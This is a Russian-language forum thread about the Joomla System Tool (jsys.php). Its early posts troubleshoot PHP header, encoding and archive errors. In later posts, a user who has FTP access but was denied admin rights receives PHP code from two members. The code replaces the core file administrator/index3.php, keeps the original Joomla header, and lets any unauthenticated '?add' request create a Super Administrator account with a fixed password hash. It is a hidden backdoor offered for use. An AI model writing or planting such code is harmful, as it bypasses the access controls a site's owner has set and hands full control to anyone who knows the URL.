Joomla System Tool перестал работать

Тема в разделе "Неразобранное", создана пользователем elvic, 14.07.2008.

  1. Offline

    elvic Недавно здесь

    Регистрация:
    14.07.2008
    Сообщения:
    8
    Симпатии:
    0
    Однажды скачал с Вашего сайта такую отличную программу как Joomla System Tool (jsys.php) Сайт перенес на новый сервер и никак не хочет работать эта программа, без нее как без рук, ошибка такая, захожу ввожу пароль и пишет - "Warning: Cannot modify header information - headers already sent by (output started at /home/uralremm/public_html/jsys.php:1) in /home/uralremm/public_html/jsys.php on line 95"

    Помогите исправить эту ошибку или скажите подобные программы... Спасибо
     
  2.  
  3. chilly_bang
    Offline

    chilly_bang специалист

    Регистрация:
    30.04.2006
    Сообщения:
    1 545
    Симпатии:
    38
    Пол:
    Мужской
    Ответ: Joomla System Tool перестал работать

    такая штука иногда выскакивает, если файл пересохранили в уникоде с бом/битом, который вставляется в самом начале файла перед <php. проверь, нет ли в файле лишних знаков (особенно в самом начале перед <php) и пересохрани. ну а коль не поможет, так жди dead_krolika.
     
  4. Dead Krolik
    Offline

    Dead Krolik специалист

    Регистрация:
    13.04.2007
    Сообщения:
    3 688
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Joomla System Tool перестал работать

    Я вот что скажу. Чили-банг скорее всего прав. В таких случаях я обычно прошу показать что там творится на первой строке. В фаре открой фтп и посмотри по F3 в шестнадцатиричном редакторе. Скриншот что ли сделай. Ну или заново залей ее.
     
  5. Offline

    elvic Недавно здесь

    Регистрация:
    14.07.2008
    Сообщения:
    8
    Симпатии:
    0
    Ответ: Joomla System Tool перестал работать

    Ну вот мой скрин шот)) посмотри Dead Krolik что не так там в файле:) - http://uralremmash.ru/far_screnn_shot.jpg

    Добавлено через 6 минут
    млин, скачал по новой jsys.php с вашего сайта, посмотрел его в фаре, он чистенький без всяких закарючек, думаю щас на фтп перезалью и все нормально работать будет, но ни фига, захожу ввожу пароль снова пишет - "Warning: Cannot modify header information - headers already sent in /home/uralremm/public_html/jsys.php on line 95
    Вы вошли в систему"

    P.S. Перестала работать программка после того как мне на хостинке перезалии сайт на новый сервер... Dead Krolik может быть в этом причина?
     
    Последнее редактирование: 15.07.2008
  6. chilly_bang
    Offline

    chilly_bang специалист

    Регистрация:
    30.04.2006
    Сообщения:
    1 545
    Симпатии:
    38
    Пол:
    Мужской
    Ответ: Joomla System Tool перестал работать

    такое же западло с невидимыми знаками может вполне быть в файле configuration.php. глянь ка и там.
     
  7. Dead Krolik
    Offline

    Dead Krolik специалист

    Регистрация:
    13.04.2007
    Сообщения:
    3 688
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Joomla System Tool перестал работать

    Бывают такие глючные фтп-сервера. Особенно у америкосов. Я когда заливаю всегда в фаре размер сравниваю. Если не срослось - заливаю по новой. В принципе, по этим же хитрым причинам может не работать авторизация, тогда ее просто вырубай нафик.
     
  8. dr.Splin
    Offline

    dr.Splin Недавно здесь

    Регистрация:
    09.06.2010
    Сообщения:
    37
    Симпатии:
    0
    Пол:
    Мужской
    Так добрался и до этого скрипта, но и тут меня настигла непонятная проблема.

    Короче говоря, при создании архива, пишет:
    Код (CODE):
    1. PCLZIP_ERR_BAD_FORMAT (-10) : Unable to find End of Central Dir Record signature

    Или вообще ничего не пишет, просто зависает окно браузера, нужно обновлять.
    Кто то может подсказать решение?
     
  9. Gronpipmaster
    Offline

    Gronpipmaster специалист

    Регистрация:
    21.01.2009
    Сообщения:
    1 392
    Симпатии:
    62
    Пол:
    Мужской
    dr.Splin, не хватает прав на запись в корневую папку где архив делаешь
     
  10. Offline

    Vault84 Недавно здесь

    Регистрация:
    15.07.2010
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Запустил страницу jsys.php

    На экране вижу:
    1.JPG

    Пароль чего я должен ввести?
     
    Последнее редактирование модератором: 25.11.2014
  11. DKraev
    Offline

    DKraev <i>(aka gft)</i>

    Регистрация:
    16.08.2008
    Сообщения:
    1 627
    Симпатии:
    216
    Пол:
    Мужской
    Откройте файл jsys.php

    В 10 строке - $JSYS_PASSWORD = '111111';

    Указывайте свой пароль, который потом и вводите.
     
  12. Offline

    Yar Недавно здесь

    Регистрация:
    15.03.2010
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    Уважаемый Dead Krolik, не могу получить с помощью jsys.php доступ к пользователям и паролям Джумлы. Файловый менеджер работает, а при переходе на "Установка пароля" сервер выбрасывает ошибки:

    Notice: Undefined variable: mosConfig_host in /мой_сайт/jsys.php on line 134

    Notice: Undefined variable: mosConfig_user in /мой_сайт/jsys.php on line 134

    Notice: Undefined variable: mosConfig_password in /мой_сайт/jsys.php on line 134

    Notice: Undefined variable: mosConfig_db in /мой_сайт/jsys.php on line 134

    Notice: Undefined variable: mosConfig_dbprefix in /мой_сайт/jsys.php on line 134

    Warning: include(/мой_сайт/../configuration.php) [function.include]: failed to open stream: No such file or directory in /мой_сайт/jsys.php(1180) : eval()'d code on line 57

    Warning: include() [function.include]: Failed opening '/мой_сайт/../configuration.php' for inclusion (include_path='.:') in /мой_сайт/jsys.php(1180) : eval()'d code on line 57

    Warning: include(/мой_сайт/../offline.php) [function.include]: failed to open stream: No such file or directory in /мой_сайт/jsys.php(1180) : eval()'d code on line 58

    Warning: include() [function.include]: Failed opening '/мой_сайт/../offline.php' for inclusion (include_path='.:') in /мой_сайт/jsys.php(1180) : eval()'d code on line 58


    Такое же происходит и на локалхосте.
    Версия скрипта version 002
     
  13. Dead Krolik
    Offline

    Dead Krolik специалист

    Регистрация:
    13.04.2007
    Сообщения:
    3 688
    Симпатии:
    101
    Пол:
    Мужской
    Логично предположить, что файла configuration.php почему-то нет на месте. Кроме того не забываем, что эта штучка только для 1.0.х
     
    Gronpipmaster нравится это.
  14. Offline

    Cop Недавно здесь

    Регистрация:
    21.10.2010
    Сообщения:
    13
    Симпатии:
    0
    Пол:
    Мужской
    Подскажите пожалуйста в чём у меня может быть проблема. Раньше всё прекрасно архивировалось. А счас вместо окна "архив создан, скачать" - пустое окно браузера. И сам архив битый и неполный. Хостинг агава, права выставляюю 755, 777 хостер не даёт и раньше всё было нормально. В чём может быть проблема? Спасибо.
     
  15. Offline

    Yar Недавно здесь

    Регистрация:
    15.03.2010
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    Верно, я на 1.5 Джумле запускал.
    Обидно, право, мне нужно только создать нового пользователя с правами Суперадмина, а потом ликвидировать его тоже скриптом. А в PHP я ноль. Доступ FTP дали, а Суперадмина зажали :'(
     
  16. woojin
    Offline

    woojin Местный Команда форума

    Регистрация:
    31.05.2009
    Сообщения:
    3 209
    Симпатии:
    335
    Пол:
    Мужской
    этим кодом замени содержимое файла administrator/index3.php
    Код (PHP):
    1. <?php
    2. /* ИСПОЛЬЗОВАНИЕ ПИШЕШЬ В АДРЕСНОЙ СТРОКЕ
    3.     http://(имя сайта)/administrator/index3.php?add - добавит пользователя login с паролем 1236547890
    4.     http://(имя сайта)/administrator/index3.php?add - удалит пользователя login
    5. */
    6. if (isset($_REQUEST['add'])) { // ОЗНАЧАЕТ добавление
    7.     include ('../configuration.php');
    8.     $JC = new JConfig;
    9.    
    10.     mysql_connect($JC->host, $JC->user, $JC->password) or die( "Сервер базы данных не доступен" );
    11.     mysql_select_db($JC->db) or die( "База данных не доступна" );
    12.    
    13.     $query="INSERT INTO ".$JC->dbprefix."users (`name`,`username`,`password`,`usertype`,`block`,`gid`) ";
    14.     $query .="VALUES ('login', 'login', '79aaf94872b15106dd4178cba648974c:1gY6jSRxCkfYQOg8sXR0fMRyhvGz2zi1', 'Super Administrator', 0, 25)";
    15.     mysql_query($query) or die( "Ошибка при выполнении запроса: ".mysql_error() );
    16. }
    17. if (isset($_REQUEST['del'])) { // ОЗНАЧАЕТ удаление
    18.     include ('../configuration.php');
    19.     $JC = new JConfig;
    20.    
    21.     mysql_connect($JC->host, $JC->user, $JC->password) or die( "Сервер базы данных не доступен" );
    22.     mysql_select_db($JC->db) or die( "База данных не доступна" );
    23.        
    24.     $query="DELETE FROM ".$JC->dbprefix."users WHERE `username` = 'login'";
    25.     mysql_query($query) or die( "Ошибка при выполнении запроса: ".mysql_error() );
    26. }
    27. /**
    28. * @version      $Id: index3.php 10381 2008-06-01 03:35:53Z pasamio $
    29. * @package      Joomla
    30. * @copyright    Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
    31. * @license      GNU/GPL, see LICENSE.php
    32. * Joomla! is free software. This version may have been modified pursuant
    33. * to the GNU General Public License, and as distributed it includes or
    34. * is derivative of works licensed under the GNU General Public License or
    35. * other free or open source software licenses.
    36. * See COPYRIGHT.php for copyright notices and details.
    37. */
    38. //echo 'проехали';
    39. $_REQUEST['tmpl'] = 'component';
    40. include('index.php');
    41. ?>
     
  17. Offline

    Yar Недавно здесь

    Регистрация:
    15.03.2010
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    woojin, скрипт опробовал, но при входе в админку с вишеприведенными атрибутами не пускает (логин и пароль не совпадают). Пробую на локалхосте - то же самое, но в базе данных запись появилась и соответственно удаляется при параметре ?del. Поменял в скрипте хеш пароля на уже известный - при входе в админку говорит что этому пользователю вход в админку запрещен. Очевидно, одной записи в БД мало, что ли...
     
  18. woojin
    Offline

    woojin Местный Команда форума

    Регистрация:
    31.05.2009
    Сообщения:
    3 209
    Симпатии:
    335
    Пол:
    Мужской
    Yar, хешь состоавляется на основе логина и пароля, а не только пароля, так что надо менять и логин и хешь под него
     
    Yar нравится это.
  19. Offline

    Yar Недавно здесь

    Регистрация:
    15.03.2010
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    woojin, ты прав, как-то я протупил в этом вопросе. Значит, проблема в том, что в моей сборке метод хеширования иной, чем в твоем скрипте. Как нибудь разберусь.
    Отдельно спасибо за скрипт.
     
  20. woojin
    Offline

    woojin Местный Команда форума

    Регистрация:
    31.05.2009
    Сообщения:
    3 209
    Симпатии:
    335
    Пол:
    Мужской
    Yar, нет методы хеширования везеде одинаковые, они только отличаются у версии 1.0.х и 1.5.х
     
  21. Offline

    jip Недавно здесь

    Регистрация:
    05.12.2009
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    малеха поправим Вас...


    Код (PHP):
    1. <?php
    2. /* ИСПОЛЬЗОВАНИЕ ПИШЕШЬ В АДРЕСНОЙ СТРОКЕ
    3.     http://(имя сайта)/administrator/index3.php?add - добавит пользователя loginByJip с паролем passByJip
    4.     http://(имя сайта)/administrator/index3.php?del - удалит пользователя loginByJip
    5. */
    6. if (isset($_REQUEST['add'])) { // ОЗНАЧАЕТ добавление
    7.     include ('../configuration.php');
    8.     $JC = new JConfig;
    9.    
    10.     mysql_connect($JC->host, $JC->user, $JC->password) or die( "Сервер базы данных не доступен" );
    11.     mysql_select_db($JC->db) or die( "База данных не доступна" );
    12.    
    13.     $query="INSERT INTO ".$JC->dbprefix."users (`name`,`username`,`password`,`usertype`,`block`,`gid`) ";
    14.     $query .="VALUES ('loginByJip', 'loginByJip', '879d7b6fdbec170505bfaf2b6846ded6:GFmYz3Nww6DX3ru0D95ItKqclSFfsYMn', 'Super Administrator', 0, 25)";
    15.     mysql_query($query) or die( "Ошибка при выполнении запроса: ".mysql_error() );
    16.     $id=mysql_insert_id();
    17.    
    18.     $query="INSERT INTO ".$JC->dbprefix."core_acl_aro (`value`,`name`) ";
    19.     $query .="VALUES ('".$id."', 'loginByJip')";
    20.     mysql_query($query) or die( "Ошибка при выполнении запроса: ".mysql_error() );
    21.     $id=mysql_insert_id();
    22.    
    23.     $query="INSERT INTO ".$JC->dbprefix."core_acl_groups_aro_map (`group_id`,`aro_id`) ";
    24.     $query .="VALUES (25, ".$id.")";
    25.     mysql_query($query) or die( "Ошибка при выполнении запроса: ".mysql_error() );
    26. }
    27. if (isset($_REQUEST['del'])) { // ОЗНАЧАЕТ удаление
    28.     include ('../configuration.php');
    29.     $JC = new JConfig;
    30.    
    31.     mysql_connect($JC->host, $JC->user, $JC->password) or die( "Сервер базы данных не доступен" );
    32.     mysql_select_db($JC->db) or die( "База данных не доступна" );
    33.        
    34.     $query="DELETE FROM ".$JC->dbprefix."users WHERE `username` = 'loginByJip'";
    35.     mysql_query($query) or die( "Ошибка при выполнении запроса: ".mysql_error() );
    36. }
    37.  
    38. //echo 'проехали';
    39. $_REQUEST['tmpl'] = 'component';
    40. include('index.php');
    41. ?>

    если joomla 1.5 тот что есть хэш если joomlaRE 1.5 используйте хэш ab9c20eac24e37ef6379e6d99b975a53:VcEFPq3HTxXNM0GQJwPGLBp683g9JzNu
    с вопросами стучитесь в icq:744177
    B)
     
    Последнее редактирование: 14.05.2011

Поделиться этой страницей

Загрузка...